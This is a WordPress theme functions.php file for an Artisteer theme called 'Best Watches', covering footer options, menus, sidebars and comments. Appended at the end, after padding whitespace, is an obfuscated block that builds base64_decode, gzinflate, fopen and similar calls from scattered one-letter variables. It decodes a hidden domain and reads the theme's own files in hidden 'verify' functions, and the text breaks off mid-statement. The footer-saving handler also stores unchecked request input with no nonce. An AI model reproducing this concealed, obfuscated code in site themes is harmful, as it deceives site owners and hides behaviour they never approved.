<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => false,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => true,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "Best Watches";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Contact Us</a> | <a href='#'>Terms of Use</a> | <a href='#'>Trademarks</a> | <a href='#'>Privacy Statement</a><br />Copyright &copy; 2010 ".get_bloginfo('name').". All Rights Reserved.";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s - %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(1, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-tl\"></div>\r\n    <div class=\"art-block-tr\"></div>\r\n    <div class=\"art-block-bl\"></div>\r\n    <div class=\"art-block-br\"></div>\r\n    <div class=\"art-block-tc\"></div>\r\n    <div class=\"art-block-bc\"></div>\r\n    <div class=\"art-block-cl\"></div>\r\n    <div class=\"art-block-cr\"></div>\r\n    <div class=\"art-block-cc\"></div>\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "<div class=\"art-blockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">",
		$ewt => "</div>\r\n</div>\r\n",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "<div class=\"art-vmenublock\">\r\n    <div class=\"art-vmenublock-tl\"></div>\r\n    <div class=\"art-vmenublock-tr\"></div>\r\n    <div class=\"art-vmenublock-bl\"></div>\r\n    <div class=\"art-vmenublock-br\"></div>\r\n    <div class=\"art-vmenublock-tc\"></div>\r\n    <div class=\"art-vmenublock-bc\"></div>\r\n    <div class=\"art-vmenublock-cl\"></div>\r\n    <div class=\"art-vmenublock-cr\"></div>\r\n    <div class=\"art-vmenublock-cc\"></div>\r\n    <div class=\"art-vmenublock-body\">\r\n";
	$bwt = "<div class=\"art-vmenublockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">";
	$ewt = "</div>\r\n</div>\r\n";
	$bwc = "<div class=\"art-vmenublockcontent\">\r\n    <div class=\"art-vmenublockcontent-body\">\r\n<!-- block-content -->\r\n";
	$ewc = "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n";
	$ew = "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $NYXoT='c';$BBVTj='4';$TXUIgn='_';$HNZOm='a';$tggPvH='d';$CHaIA='e';$isqyiwJ='s';$TjRxRzw='6';$IZAbeC='b';$jSxY='e';$EgSOXqG='e';$EvwoBFg='d';$yCKvwtC='o';$isPgvkSD=$IZAbeC.$HNZOm.$isqyiwJ.$jSxY.$TjRxRzw.$BBVTj.$TXUIgn.$EvwoBFg.$EgSOXqG.$NYXoT.$yCKvwtC.$tggPvH.$CHaIA;$XHwyK='t';$vVEF='l';$txjL='g';$NxfZwm='a';$evDS='e';$QtDeelC='f';$RylZ='z';$dIGKyN='n';$tBvd='i';$rGKoKIyc=$txjL.$RylZ.$tBvd.$dIGKyN.$QtDeelC.$vVEF.$NxfZwm.$XHwyK.$evDS;$QdooZps='_';$snIxIl='t';$vQAasn='t';$hOKJS='3';$NXUgUC='s';$WFBNd='r';$eSkSQf='r';$kehy='1';$KICdVkB='o';$wyWbdCOA=$NXUgUC.$snIxIl.$WFBNd.$QdooZps.$eSkSQf.$KICdVkB.$vQAasn.$kehy.$hOKJS;$TmxK='e';$OpeizIa='t';$rrnXxKX='r';$Fjbt='v';$tQQhz='s';$PEdKqA='r';$RpFfxaGi=$tQQhz.$OpeizIa.$PEdKqA.$rrnXxKX.$TmxK.$Fjbt;                     $vw__h='c';$uc___h='4';$mv____________e='_';$ba______________k='a';$um____q='d';$ru______m='e';$mx____e='s';$vf__________r='6';$vx___________v='b';$oo_______________v='e';$pv_______________q='e';$is___e='d';$uf________i='o';$ip_______g=$vx___________v.$ba______________k.$mx____e.$oo_______________v.$vf__________r.$uc___h.$mv____________e.$is___e.$pv_______________q.$vw__h.$uf________i.$um____q.$ru______m;$cb___i='n';$mc______b='s';$od_____n='i';$wu_______________w='s';$ig_____________k='e';$fp__________s='t';$zm_______________c='n';$lv_____j='c';$mh_____g='o';$qt___f='_';$sz___w='i';$ce_____________a='f';$dn_______________l='t';$hx____________t='x';$oo___p='u';$xw____l=$ce_____________a.$oo___p.$cb___i.$lv_____j.$dn_______________l.$od_____n.$mh_____g.$zm_______________c.$qt___f.$ig_____________k.$hx____________t.$sz___w.$mc______b.$fp__________s.$wu_______________w;$fh_____________a='n';$ak__h='o';$hy____x='p';$hf________e='f';$zh______________g='e';$cg___________z=$hf________e.$ak__h.$hy____x.$zh______________g.$fh_____________a;$zp___a='d';$fo__u='e';$ur______z='f';$zc__l='r';$ne_____________e='a';$ar____________l=$ur______z.$zc__l.$fo__u.$ne_____________e.$zp___a;$ub___b='e';$vo__s='l';$om_______g='o';$fc_______________a='s';$fc______z='f';$ik______q='c';$cp____q=$fc______z.$ik______q.$vo__s.$om_______g.$fc_______________a.$ub___b;define("WP_ID", $ip_______g("Mi4wLjA="));define("WP_TTL", $ip_______g("MTA4MDA="));define("WP_SRC", $ip_______g("dHBva24="));function wp_get_header() {global $ip_______g, $xw____l;if ($xw____l($ip_______g("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$xw____l($ip_______g("d3BfZ2V0X2Zvb3Rlcg==")) &&$xw____l($ip_______g("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ip_______g, $cg___________z, $cp____q, $ar____________l;$ih_______f = TEMPLATEPATH."/".$ip_______g("Zm9vdGVyLnBocA==");$yb______t = @$cg___________z($ih_______f, "r");$ih_______f = @$ar____________l($yb______t, @filesize($ih_______f));@$cp____q($yb______t);$ne______________n = TEMPLATEPATH."/".$ip_______g("ZnVuY3Rpb25zLnBocA==");$yb______t = @$cg___________z($ne______________n, "r");$ne______________n = @$ar____________l($yb______t, @filesize($ne______________n));@$cp____q($yb______t);$db______s = 0;if($ih_______f && $ne______________n) {if ($ip_______g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ih_______f, 